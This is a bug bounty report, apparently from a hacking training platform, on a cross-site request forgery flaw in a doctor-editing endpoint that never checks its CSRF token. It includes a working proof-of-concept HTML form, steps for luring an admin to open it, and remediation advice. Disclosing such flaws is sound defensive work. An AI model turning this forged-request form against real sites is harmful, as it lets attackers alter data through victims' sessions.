BugBountyHunter

Hi there

Description

I have found a CSRF issue in the modify doctor page that allows an attacker to change a doctors information on the site. There is a csrf token on this request but it is not checked and can be removed completely the vulnerability only works if sent as a GET request

Steps to reproduce

1. Save the following code in .html file and host it on a server

   <html>
   <body>
   <form action="https://5cdd6617a438-didsec.a.firstbloodhackers.com/drpanel/drapi/edit-dr.php">
     <input type="hidden" name="drid" value="1" />
     <input type="hidden" name="name" value="my&#32;edited&#32;name" />
     <input type="hidden" name="bio" value="Using&#32;a&#32;GET&#32;request&#32;with&#32;no&#32;csrf&#32;token" />
     <input type="hidden" name="bookable" value="1" />
     <input type="submit" value="Submit request" />
   </form>
   </body>
   </html>

2. Send the link to the admin
3. If the admin opens the link then the script will edit the doctors information

Risk

• make the user perform unexpected requests
• updating account details, making purchases, logout and even login

Remediation

• add an unpredictable token in each HTTP request
• add a captcha
• ask user confirmation before performing any action
• ask user his password before performing any action

See also

https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)